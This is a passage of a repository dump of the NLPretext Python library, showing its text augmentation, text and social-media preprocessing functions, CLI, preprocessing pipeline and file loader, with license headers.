raise ValueError('Please input a valid country code, in 2 letters. Eg. "us" for USA. ')
return list(set(stopwords))
================================================
FILE: nlpretext/augmentation/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
================================================
FILE: nlpretext/augmentation/text_augmentation.py
================================================
from typing import Any, Dict, List, Optional, Tuple
import logging
import re
from itertools import combinations
import nlpaug.augmenter.word as naw
class CouldNotAugment(ValueError): # noqa: D101
pass
class UnavailableAugmenter(ValueError): # noqa: D101
pass
def augment_text(
text: str,
method: str,
stopwords: Optional[List[str]] = None,
entities: Optional[List[Dict[str, Any]]] = None,
) -> Tuple[str, List[Dict[str, Any]]]:
"""
Given a text with or without associated entities, generate a new text by
modifying some words in the initial one, modifications depend on the chosen
method (substitution with synonym, addition, deletion). If entities are
given as input, they will remain unchanged. If you want some words other
than entities to remain unchanged, specify it within the stopwords argument.
Parameters
----------
text : string
method : {'wordnet_synonym', 'aug_sub_bert'}
augmenter to use ('wordnet_synonym' or 'aug_sub_bert')
stopwords : list, optional
list of words to freeze throughout the augmentation
entities : list, optional
entities associated to text if any, must be in the following format:
[
{
'entity': str,
'word': str,
'startCharIndex': int,
'endCharIndex': int
},
{
...
}
]
Returns
-------
Augmented text and optional augmented entities
"""
augmenter = get_augmenter(method, stopwords)
augmented_text = augmenter.augment(text)
if entities is not None:
return process_entities_and_text(entities, text, augmented_text)
return augmented_text, []
def process_entities_and_text(
entities: List[Dict[str, Any]], text: str, augmented_text: str
) -> Tuple[str, List[Dict[str, Any]]]:
"""
Given a list of initial entities, verify that they have not been altered by
the data augmentation operation and are still in the augmented text.
Parameters
----------
entities: list
entities associated to text, must be in the following format:
[
{
'entity': str,
'word': str,
'startCharIndex': int,
'endCharIndex': int
},
{
...
}
]
text: str
initial text
augmented_text: str
new text resulting of data augmentation operation
Returns
-------
Augmented text and entities with their updated position in augmented text
"""
formatted_entities = [
(
text[entities[i]["startCharIndex"] : entities[i]["endCharIndex"]].strip(),
entities[i]["entity"],
)
for i in range(len(entities))
]
if are_entities_in_augmented_text(entities, augmented_text):
augmented_entities = get_augmented_entities(augmented_text, formatted_entities)
clean_entities = clean_sentence_entities(augmented_text, augmented_entities)
return augmented_text, clean_entities
raise CouldNotAugment("Text was not correctly augmented because entities were altered")
def are_entities_in_augmented_text(entities: List[Dict[str, Any]], augmented_text: str) -> bool:
"""
Given a list of entities, check if all the words associated to each entity
are still present in augmented text.
Parameters
----------
entities : list
entities associated to initial text, must be in the following format:
[
{
'entity': str,
'word': str,
'startCharIndex': int,
'endCharIndex': int
},
{
...
}
]
augmented_text : str
Returns
-------
True if all entities are present in augmented text, False otherwise
"""
check = True
for ent in entities:
if ent["word"] not in augmented_text:
check = False
return check
return check
def get_augmenter(method: str, stopwords: Optional[List[str]] = None) -> naw.SynonymAug:
"""
Initialize an augmenter depending on the given method.
Parameters
----------
method : str (supported methods: wordnet_synonym and aug_sub_bert)
stopwords : list
list of words to freeze throughout the augmentation
Returns
-------
Initialized nlpaug augmenter
"""
if method == "wordnet_synonym":
return naw.SynonymAug(aug_src="wordnet", stopwords=stopwords)
if method == "aug_sub_bert":
return naw.ContextualWordEmbsAug(
model_path="bert-base-uncased", action="substitute", stopwords=stopwords
)
raise UnavailableAugmenter(
"The given augmenter is not supported. You must choose one \
of the following: wordnet_synonym or aug_sub_bert"
)
def get_augmented_entities(
sentence_augmented: str, entities: List[Tuple[str, Any]]
) -> List[Dict[str, Any]]:
"""
Get entities with updated positions (start and end) in augmented text.
Parameters
----------
sentence_augmented : str
augmented text
entities : list
entities associated to initial text, must be in the following format:
[
{
'entity': str,
'word': str,
'startCharIndex': int,
'endCharIndex': int
},
{
...
}
]
Returns
-------
Entities with updated positions related to augmented text
"""
entities_augmented = []
for entity in entities:
search = re.search(entity[0].strip(), sentence_augmented)
if search:
start_index = search.start()
end_index = search.end()
new_entity = {
"entity": entity[1],
"word": sentence_augmented[start_index:end_index],
"startCharIndex": start_index,
"endCharIndex": end_index,
}
entities_augmented.append(new_entity)
return entities_augmented
def clean_sentence_entities(text: str, entities: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
"""
Paired entities check to remove nested entities, the longest entity is kept.
Parameters
----------
text : str
augmented text
entities : list
entities associated to augmented text, must be in the following format:
[
{
'entity': str,
'word': str,
'startCharIndex': int,
'endCharIndex': int
},
{
...
}
]
Returns
-------
Cleaned entities
"""
entities_to_clean = [dict(s) for s in {frozenset(d.items()) for d in entities}]
for element1, element2 in combinations(entities_to_clean, 2):
result = check_interval_included(element1, element2)
if result is not None:
try:
entities_to_clean.remove(result[0])
except IndexError:
logging.warning(
"Cant remove entity : {} \n entities are now :{} \n for sentence : {} ".format(
result, entities_to_clean, text
)
)
continue
return entities_to_clean
def check_interval_included(
element1: Dict[str, Any], element2: Dict[str, Any]
) -> Optional[Tuple[Dict[str, Any], Dict[str, Any]]]:
"""
Comparison of two entities on start and end positions to find if they are nested.
Parameters
----------
element1 : dict
element2 : dict
both of them in the following format
{
'entity': str,
'word': str,
'startCharIndex': int,
'endCharIndex': int
}
Returns
-------
If there is an entity to remove among the two returns a tuple
(element to remove, element to keep).
If not, returns None
"""
if (
(element1 != element2)
and (element1["startCharIndex"] >= element2["startCharIndex"])
and (element1["endCharIndex"] <= element2["endCharIndex"])
):
return element1, element2
if (
(element1 != element2)
and (element2["startCharIndex"] >= element1["startCharIndex"])
and (element2["endCharIndex"] <= element1["endCharIndex"])
):
return element2, element1
if (
(element1 != element2)
and (element1["startCharIndex"] >= element2["startCharIndex"])
and (element1["endCharIndex"] >= element2["endCharIndex"])
and (element1["startCharIndex"] <= element2["endCharIndex"] - 1)
):
return element1, element2
if (
(element1 != element2)
and (element2["startCharIndex"] >= element1["startCharIndex"])
and (element2["endCharIndex"] >= element1["endCharIndex"])
and (element2["startCharIndex"] < element1["endCharIndex"] - 1)
):
return element2, element1
return None
================================================
FILE: nlpretext/basic/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
================================================
FILE: nlpretext/basic/preprocess.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from typing import List, Optional
import re
import unicodedata
from flashtext import KeywordProcessor
from ftfy import fix_text as _fix_text
from nlpretext._config import constants
from nlpretext._utils.phone_number import extract_phone_numbers as _extract_phone_numbers
from nlpretext._utils.stopwords import get_stopwords
from nlpretext.token.tokenizer import tokenize
def normalize_whitespace(text: str) -> str:
"""
----
Copyright 2016 Chartbeat, Inc.
Code from textacy: https://github.com/chartbeat-labs/textacy
----
Given ``text`` str, replace one or more spacings with a single space, and
one or more linebreaks with a single newline. Also strip leading/trailing
whitespace.
eg. " foo bar " -> "foo bar"
Parameters
----------
text : string
Returns
-------
string
"""
text = constants.NONBREAKING_SPACE_REGEX.sub(
" ", constants.LINEBREAK_REGEX.sub(r"\n", text)
).strip()
return text
def remove_whitespace(text: str) -> str:
"""
Given ``text`` str, remove one or more spacings and linebreaks.
Also strip leading/trailing whitespace.
eg. " foo bar " -> "foobar".
Parameters
----------
text : string
Returns
-------
string
"""
return constants.NONBREAKING_SPACE_REGEX.sub(
"", constants.LINEBREAK_REGEX.sub("", text)
).strip()
def lower_text(text: str) -> str:
"""
Given ``text`` str, transform it into lowercase.
Parameters
----------
text : string
Returns
-------
string
"""
return text.lower()
def filter_groups(token: str, ignored_stopwords: Optional[List[str]] = None) -> str:
"""
Given ``token`` str and a list of groups of words
that were concatenated into tokens, reverses the tokens
to their ungrouped state.
Parameters
----------
token : string
ignored_stopwords : list of strings
Returns
-------
string
"""
if ignored_stopwords:
for group in ignored_stopwords:
if token == remove_whitespace(group):
token = group
return token
def ungroup_ignored_stopwords(
tokens: List[str], ignored_stopwords: Optional[List[str]] = None
) -> List[str]:
"""
Given ``tokens`` list of str and a list of groups of words
that are concatenated in tokens, reverses the tokens to
their ungrouped state.
Parameters
----------
tokens : list of strings
ignored_stopwords : list of strings
Returns
-------
list of strings
"""
return [filter_groups(token, ignored_stopwords) for token in tokens]
def remove_stopwords(
text: str,
lang: str,
custom_stopwords: Optional[List[str]] = None,
ignored_stopwords: Optional[List[str]] = None,
) -> str:
"""
Given ``text`` str, remove classic stopwords for a given language and
custom stopwords given as a list. Words and groups of words from
ignored_stopwords list are ignored during stopwords removal.
Parameters
----------
text : string
lang : string
custom_stopwords : list of strings
ignored_stopwords : list of strings
Returns
-------
string
Raises
------
ValueError
if ``custom_stopwords`` and ``ignored_stopwords`` have common elements.
"""
if custom_stopwords and ignored_stopwords:
common_elements = set(custom_stopwords).intersection(set(ignored_stopwords))
if common_elements != set():
raise ValueError(
f"Found common words in custom_stopwords and ignored_stopwords: \
{common_elements}. Please remove duplicated values."
)
stopwords = get_stopwords(lang)
if ignored_stopwords:
keyword_processor = KeywordProcessor()
singletons_to_keep = [x for x in ignored_stopwords if len(x.split()) == 1]
for group_of_words in ignored_stopwords:
keyword_processor.add_keyword(group_of_words, remove_whitespace(group_of_words))
text = keyword_processor.replace_keywords(text)
else:
singletons_to_keep = []
if custom_stopwords:
stopwords += custom_stopwords
if not text:
raise ValueError("Found empty text. Please fix it before using this function.")
if lang in ["fr", "en"]:
lang_module = {"fr": "fr_spacy", "en": "en_spacy"}[lang]
tokens = tokenize(text, lang_module)
else:
tokens = text.split()
tokens = [t for t in tokens if (t not in stopwords or t in singletons_to_keep)]
tokens = ungroup_ignored_stopwords(tokens, ignored_stopwords)
return " ".join(tokens)
def remove_eol_characters(text: str) -> str:
r"""
Remove end of line (\n) char.
Parameters
----------
text : str
Returns
-------
str
"""
text = text.replace("\n", " ")
return text
def fix_bad_unicode(text: str, normalization: str = "NFC") -> str:
"""
----
Copyright 2016 Chartbeat, Inc.
Code from textacy: https://github.com/chartbeat-labs/textacy
----
Fix unicode text that's "broken" using `ftfy
`_;
this includes mojibake, HTML entities and other code cruft,
and non-standard forms for display purposes.
Parameters
----------
text : string
normalization ({'NFC', 'NFKC', 'NFD', 'NFKD'}):
if 'NFC', combines characters and diacritics written using separate
code points, e.g. converting "e" plus an acute accent modifier into
"é"; unicode
can be converted to NFC form without any change in its meaning!
if 'NFKC', additional normalizations are applied that can change
the meanings of characters, e.g. ellipsis characters will be replaced
with three periods
Returns
-------
string
"""
text = _fix_text(text, normalization=normalization)
return text
def unpack_english_contractions(text: str) -> str:
"""
----
Copyright 2016 Chartbeat, Inc.
Code from textacy: https://github.com/chartbeat-labs/textacy
----
Replace *English* contractions in ``text`` str with their unshortened
forms.
N.B. The "'d" and "'s" forms are ambiguous (had/would, is/has/possessive),
so are left as-is.
eg. "You're fired. She's nice." -> "You are fired. She's nice."
Parameters
----------
text : string
Returns
-------
string
"""
# standard
text = constants.CONTRACTION_NT_NOT.sub(
r"\1\2 not",
text,
)
text = constants.CONTRACTION_LL_WILL.sub(
r"\1\2 will",
text,
)
text = constants.CONTRACTION_RE_ARE.sub(r"\1\2 are", text)
text = constants.CONTRACTION_VE_HAVE.sub(
r"\1\2 have",
text,
)
text = constants.CONTRACTION_CANT_CANNOT.sub(r"\1\2n not", text)
text = constants.CONTRACTION_M_AM.sub(r"\1\2 am", text)
text = constants.CONTRACTION_LET_LETUS.sub(r"\1\2 us", text)
text = constants.CONTRACTION_WONT_WILLNOT.sub(r"\1\2ill not", text)
text = constants.CONTRACTION_SHANT_SHALLNOT.sub(r"\1\2hall not", text)
text = constants.CONTRACTION_YALL_YOUALL.sub(r"\1\2ou all", text)
return text
def replace_urls(text: str, replace_with: str = "*URL*") -> str:
"""
----
Copyright 2016 Chartbeat, Inc.
Code from textacy: https://github.com/chartbeat-labs/textacy
----
Replace all URLs in ``text`` str with ``replace_with`` str.
Parameters
----------
text : string
replace_with : string
the string you want the URL to be replaced with.
Returns
-------
string
"""
text = constants.URL_REGEX.sub(replace_with, constants.SHORT_URL_REGEX.sub(replace_with, text))
return text
def replace_emails(text: str, replace_with: str = "*EMAIL*") -> str:
"""
----
Copyright 2016 Chartbeat, Inc.
Code from textacy: https://github.com/chartbeat-labs/textacy
----
Replace all emails in ``text`` str with ``replace_with`` str
Parameters
----------
text : string
replace_with : string
the string you want the email address to be replaced with.
Returns
-------
string
"""
text = constants.EMAIL_REGEX.sub(replace_with, text)
return text
def replace_phone_numbers(
text: str,
country_to_detect: List[Optional[str]],
replace_with: str = "*PHONE*",
method: str = "regex",
) -> str:
"""
----
Copyright 2016 Chartbeat, Inc.
Inspired code from textacy: https://github.com/chartbeat-labs/textacy
----
Replace all phone numbers in ``text`` str with ``replace_with`` str
Parameters
----------
text : string
replace_with : string
the string you want the phone number to be replaced with.
method : ['regex','detection']
regex is faster but will omit a lot of numbers, while detection will
catch every numbers, but takes a while.
country_to_detect : list
If a list of country code is specified, will catch every number
formatted.
Only when method = 'detection'.
Returns
-------
string
"""
if method == "regex":
text = constants.PHONE_REGEX.sub(replace_with, text)
elif method == "detection":
found_nums = _extract_phone_numbers(text, countrylist=country_to_detect)
# order by lenght to avoid truncated numbers to be removed first.
found_nums.sort(key=len, reverse=True)
for phone_number in found_nums:
text = text.replace(phone_number, replace_with)
else:
raise ValueError(
'Please input a valid method between "regex" or \
"detection"'
)
return text
def replace_numbers(text: str, replace_with: str = "*NUMBER*") -> str:
"""
----
Copyright 2016 Chartbeat, Inc.
Code from textacy: https://github.com/chartbeat-labs/textacy
----
Replace all numbers in ``text`` str with ``replace_with`` str.
Parameters
----------
text : string
replace_with : string
the string you want the number to be replaced with.
Returns
-------
string
"""
text = constants.NUMBERS_REGEX.sub(replace_with, text)
return text
def replace_currency_symbols(text: str, replace_with: Optional[str] = None) -> str:
"""
----
Copyright 2016 Chartbeat, Inc.
Code from textacy: https://github.com/chartbeat-labs/textacy
----
Replace all currency symbols in ``text`` str with string specified by
``replace_with`` str.
Parameters
----------
text : str
raw text
replace_with : None or string
if None (default), replace symbols with
their standard 3-letter abbreviations (e.g. '$' with 'USD', '£'
with 'GBP'); otherwise, pass in a string with which to replace all
symbols (e.g. "*CURRENCY*")
Returns
-------
string
"""
if replace_with is None:
for k, v in constants.CURRENCIES.items():
text = text.replace(k, v)
else:
text = constants.CURRENCY_REGEX.sub(replace_with, text)
return text
def remove_punct(text: str, marks: Optional[str] = None) -> str:
"""
Remove punctuation from ``text`` by replacing all instances of ``marks``
with whitespace.
Parameters
----------
text : str
raw text
marks : str or None
If specified, remove only the characters in this string,
e.g. ``marks=',;:'`` removes commas, semi-colons, and colons.
Otherwise, all punctuation marks are removed.
Returns
-------
string
Note
-------
When ``marks=None``, Python's built-in :meth:`str.translate()` is
used to remove punctuation; otherwise, a regular expression is used
instead. The former's performance is about 5-10x faster.
"""
if marks:
text = re.sub(f"[{re.escape(marks)}]+", " ", text, flags=re.UNICODE)
else:
text = text.translate(constants.PUNCT_TRANSLATE_UNICODE)
return text
def remove_accents(text: str, method: str = "unicode") -> str:
"""
Remove accents from any accented unicode characters in ``text`` str,
either by transforming them into ascii equivalents or removing them
entirely.
Parameters
----------
text : str
raw text
method : ({'unicode', 'ascii'})
if 'unicode', remove accented
char for any unicode symbol with a direct ASCII equivalent; if 'ascii',
remove accented char for any unicode symbol
NB: the 'ascii' method is notably faster than 'unicode', but less good
Returns
-------
string
Raises
------
ValueError
if ``method`` is not in {'unicode', 'ascii'}
"""
if method == "unicode":
text = "".join(
c for c in unicodedata.normalize("NFKD", text) if not unicodedata.combining(c)
)
elif method == "ascii":
text = unicodedata.normalize("NFKD", text).encode("ascii", errors="ignore").decode("ascii")
else:
msg = f'`method` must be either "unicode" and "ascii", not {method}'
raise ValueError(msg)
return text
def remove_multiple_spaces_and_strip_text(text: str) -> str:
"""
Remove multiple spaces, strip text, and remove '-', '*' characters.
Parameters
----------
text : str
the text to be processed
Returns
-------
string
the text with removed multiple spaces and strip text
"""
regex_remove_multiple_spaces_list = ["\\t", "[\\s\\-\\*]{2,}"]
for regex_remove_multiple_spaces in regex_remove_multiple_spaces_list:
text = re.sub(regex_remove_multiple_spaces, " ", text)
text = text.strip()
return text
def filter_non_latin_characters(text: str) -> str:
"""
Function that filters non latin characters of a text.
Parameters
----------
text : string
Returns
-------
string
"""
text = constants.LATIN_CHARACTERS_RE.sub(" ", text)
text = normalize_whitespace(text)
return text
================================================
FILE: nlpretext/cli/__init__.py
================================================
================================================
FILE: nlpretext/cli/__main__.py
================================================
# mypy: disable-error-code="attr-defined"
import typer
from nlpretext import __version__
from nlpretext.cli import preprocess
from rich.console import Console
app = typer.Typer(
name="nlpretext",
help="All the goto functions you need to handle NLP use-cases, integrated in NLPretext",
add_completion=True,
)
app.add_typer(preprocess.app, name="preprocess")
console = Console()
def version_callback(value: bool) -> None:
"""Prints the version of the package."""
if value:
console.print(f"[yellow]nlpretext[/] version: [bold blue]{__version__}[/]")
raise typer.Exit()
================================================
FILE: nlpretext/cli/preprocess.py
================================================
from typing import List
import typer
from nlpretext.preprocessor import Preprocessor
from nlpretext.textloader import TextLoader
from rich.console import Console
app = typer.Typer()
console = Console()
@app.command()
def run(
input: List[str] = typer.Option( # noqa: B008
[],
"-i",
"--input",
case_sensitive=False,
help="List of files that will be preprocessed",
),
output: str = typer.Option(
None,
"-o",
"--output",
case_sensitive=False,
help="File that will store the result of the preprocessing",
),
) -> None:
"""Runs NLPretext on a list of files and outputs the result in parquet format
or shows the result if no output is provided.
Args:
input: List of files that will be preprocessed
output: File that will store the result of the preprocessing
"""
text_loader = TextLoader()
preprocessor = Preprocessor()
preprocessed_text_dataframe = text_loader.read_text(input, preprocessor=preprocessor)
if output:
preprocessed_text_dataframe.to_parquet(output)
else:
console.print(preprocessed_text_dataframe)
================================================
FILE: nlpretext/preprocessor.py
================================================
from typing import Any, Callable, Dict, List, Optional
from nlpretext.basic.preprocess import fix_bad_unicode, normalize_whitespace, remove_eol_characters
from nlpretext.social.preprocess import (
remove_emoji,
remove_hashtag,
remove_html_tags,
remove_mentions,
)
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import FunctionTransformer
class Preprocessor:
def __init__(self):
"""Initialize preprocessor object to apply all text transformation."""
self.__operations = []
self.pipeline = None
def pipe(self, operation: Callable[[Any], Any], args: Optional[Dict[str, Any]] = None) -> None:
"""
Add an operation and its arguments to pipe in the preprocessor.
Parameters
----------
operation : callable
text preprocessing function
args : dict of arguments
"""
self.__operations.append({"operation": operation, "args": args})
@staticmethod
def build_pipeline(operation_list: List[Dict[Any, Any]]) -> Pipeline:
"""
Build sklearn pipeline from a operation list.
Parameters
----------
operation_list : iterable
list of __operations of preprocessing
Returns
-------
sklearn.pipeline.Pipeline
"""
return Pipeline(
steps=[
(
operation["operation"].__name__,
FunctionTransformer(operation["operation"], kw_args=operation["args"]),
)
for operation in operation_list
]
)
def run(self, text: str) -> str:
"""
Apply pipeline to text.
Parameters
----------
text : string
text to preprocess
Returns
-------
string
"""
operations = self.__operations
if operations == []:
operations_to_pipe = (
remove_html_tags,
remove_mentions,
remove_emoji,
remove_hashtag,
remove_eol_characters,
fix_bad_unicode,
normalize_whitespace,
)
operations = [
{"operation": operation, "args": None} for operation in operations_to_pipe
]
self.pipeline = self.build_pipeline(operations)
text = self.pipeline.transform(text)
return text
================================================
FILE: nlpretext/py.typed
================================================
================================================
FILE: nlpretext/social/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
================================================
FILE: nlpretext/social/preprocess.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from typing import List, Tuple
import emoji as _emoji
from nlpretext._config import constants
from nlpretext.basic.preprocess import normalize_whitespace
def remove_mentions(text: str) -> str:
"""
Function that removes words preceded with a '@'.
Parameters
----------
text : str
Returns
-------
string
"""
text = normalize_whitespace(constants.AT_PATTERN.sub("", text))
return text
def extract_mentions(text: str) -> List[str]:
"""
Function that extracts words preceded with a '@'
eg. "I take care of my skin with @thisproduct" --> ["@thisproduct"].
Parameters
----------
text : str
Returns
-------
string
"""
return constants.AT_PATTERN.findall(text)
def remove_html_tags(text: str) -> str:
"""
Function that removes words between < and >.
Parameters
----------
text : str
Returns
-------
string
"""
text = normalize_whitespace(constants.HTML_TAG_PATTERN.sub("", text))
return text
def remove_emoji(text: str) -> str:
"""
Remove emoji from any str by stripping any unicode in the range of Emoji unicode
as defined in the unicode convention:
http://www.unicode.org/emoji/charts/full-emoji-list.html.
Parameters
----------
text : str
Returns
-------
str
"""
text = _emoji.replace_emoji(text, "")
return text
# TODO: replace mutable default value :
# https://docs.quantifiedcode.com/python-anti-patterns/correctness/mutable_default_value_as_argument.html
def convert_emoji_to_text(text: str, code_delimiters: Tuple[str, str] = (":", ":")) -> str:
"""
Convert emoji to their CLDR Short Name, according to the unicode convention
http://www.unicode.org/emoji/charts/full-emoji-list.html
eg. 😀 --> :grinning_face:
Parameters
----------
text : str
code_delimiters : tuple of symbols around the emoji code.
eg: (':',':') --> :grinning_face:
Returns
-------
str
string
"""
return _emoji.demojize(text, delimiters=code_delimiters)
def extract_emojis(text: str) -> List[str]:
"""
Function that extracts emojis from a text and translates them into words
eg. "I take care of my skin 😀 :(" --> [":grinning_face:"].
Parameters
----------
text : str
Returns
-------
list
list of all emojis converted with their unicode conventions
"""
emojis_in_text = _emoji.emoji_list(text)
emojis_converted = [
convert_emoji_to_text(emoji_text.get("emoji", "")) for emoji_text in emojis_in_text
]
return emojis_converted
def extract_hashtags(text: str) -> List[str]:
"""
Function that extracts words preceded with a '#'
eg. "I take care of my skin #selfcare#selfestim" --> ["skincare", "selfestim"].
Parameters
----------
text : str
Returns
-------
list
list of all hashtags
"""
return constants.HASHTAG_PATTERN.findall(text)
def remove_hashtag(text: str) -> str:
"""
Function that removes words preceded with a '#'
eg. "I take care of my skin #selfcare#selfestim" --> "I take care of my skin".
Parameters
----------
text : str
Returns
-------
str
text of a post without hashtags
"""
text = normalize_whitespace(constants.HASHTAG_PATTERN.sub("", text))
return text
================================================
FILE: nlpretext/textloader.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from types import ModuleType
from typing import Any, List, Optional, Union
import sys
import warnings
import pandas as pd
try:
from nlpretext._utils import daskloader
except ImportError:
warnings.warn(
"Dask not found, switching to pandas. To be able to use Dask, run : pip install nlpretext[dask]", # noqa: E501
stacklevel=2,
)
from nlpretext._utils import pandasloader
from nlpretext._utils.file_loader import check_text_file_format
from nlpretext.preprocessor import Preprocessor
class TextLoader:
def __init__(self, text_column="text", encoding="utf-8", file_format=None, use_dask=True):
"""
Initialize DataLoader object to retrieve text data.
Parameters
----------
text_column: string
name of the column containing texts in json / csv / parquet files
encoding: string
encoding of the text to be loaded, can be utf-8 or latin-1 for example
file_format: string | None
format of the files to be loaded
use_dask: bool
use dask to load text
"""
self.text_column = text_column
self.encoding = encoding
self.file_format = file_format
self.use_dask = use_dask
self.loader: ModuleType
if self.use_dask:
if "dask" in sys.modules:
self.loader = daskloader
else:
warnings.warn(
"Dask is not intalled, switching to pandas. Run pip install dask to use dask",
stacklevel=2,
)
self.use_dask = False
self.loader = pandasloader
else:
self.loader = pandasloader
def __repr__(self):
"""Method to represent class attributes."""
class_repr_dict = {
"text_column": self.text_column,
"encoding": self.encoding,
"file_format": self.file_format,
"use_dask": self.use_dask,
}
return f"TextLoader({class_repr_dict})"
def _read_text_txt(self, files_path):
"""
Read txt text files stored in files_path.
Parameters
----------
files_path : string | list[string]
single or multiple files path
Returns
-------
dask.dataframe | pandas.DataFrame
"""
text_ddf = self.loader.read_text(files_path, encoding=self.encoding)
text_ddf.columns = [self.text_column]
return text_ddf
def _read_text_json(self, files_path):
"""
Read json text files stored in files_path.
Parameters
----------
files_path : string | list[string]
single or multiple files path
Returns
-------
dask.dataframe | pandas.DataFrame
"""
text_ddf = self.loader.read_json(files_path, encoding=self.encoding)
try:
return text_ddf[[self.text_column]]
except KeyError as e:
raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e
def _read_text_csv(self, files_path):
"""
Read csv text files stored in files_path.
Parameters
----------
files_path : string | list[string]
single or multiple files path
Returns
-------
dask.dataframe | pandas.DataFrame
"""
text_ddf = self.loader.read_csv(files_path, encoding=self.encoding)
try:
return text_ddf[[self.text_column]]
except KeyError as e:
raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e
def _read_text_parquet(self, files_path):
"""
Read parquet text files stored in files_path.
Parameters
----------
files_path : string | list[string]
single or multiple files path
Returns
-------
dask.dataframe | pandas.DataFrame
"""
text_ddf = self.loader.read_parquet(files_path, encoding=self.encoding)
try:
return text_ddf[[self.text_column]]
except KeyError as e:
raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e
def read_text(
self,
files_path: Union[str, List[str]],
file_format: Optional[str] = None,
encoding: Optional[str] = None,
compute_to_pandas: bool = True,
preprocessor: Optional[Preprocessor] = None,
) -> Union[pd.DataFrame, Any]:
"""
Read the text files stored in files_path.
Parameters
----------
files_path: string | list[string]
single or multiple files path
file_format: string
Format of the files to be loaded, to be selected among csv, json, parquet or txt
encoding:
encoding of the text to be loaded, can be utf-8 or latin-1 for example
compute_to_pandas: bool
True if user wants Dask Dataframe to be computed as pandas DF, False otherwise
preprocessor: nlpretext.preprocessor.Preprocessor
NLPretext preprocessor can be specified to pre-process text after loading
Returns
-------
dask.dataframe | pandas.DataFrame
"""
if encoding is not None:
self.encoding = encoding
if file_format is not None:
self.file_format = file_format
else:
self.file_format = check_text_file_format(files_path)
reader_mapping = {
"csv": self._read_text_csv,
"txt": self._read_text_txt,
"json": self._read_text_json,
"parquet": self._read_text_parquet,
}
reader = reader_mapping.get(self.file_format)
if reader is None:
raise ValueError("Format not handled")
text = reader(files_path)
if preprocessor is not None:
if isinstance(preprocessor, Preprocessor):
print(f"before: {text.head()}")
text[self.text_column] = text[self.text_column].apply(preprocessor.run)
print(f"after: {text.head()}")
else:
raise ValueError("Only NLPretext preprocessors can be specified")
if compute_to_pandas and self.use_dask:
return text.compute()
return text
================================================
FILE: nlpretext/token/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
================================================
FILE: nlpretext/token/preprocess.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
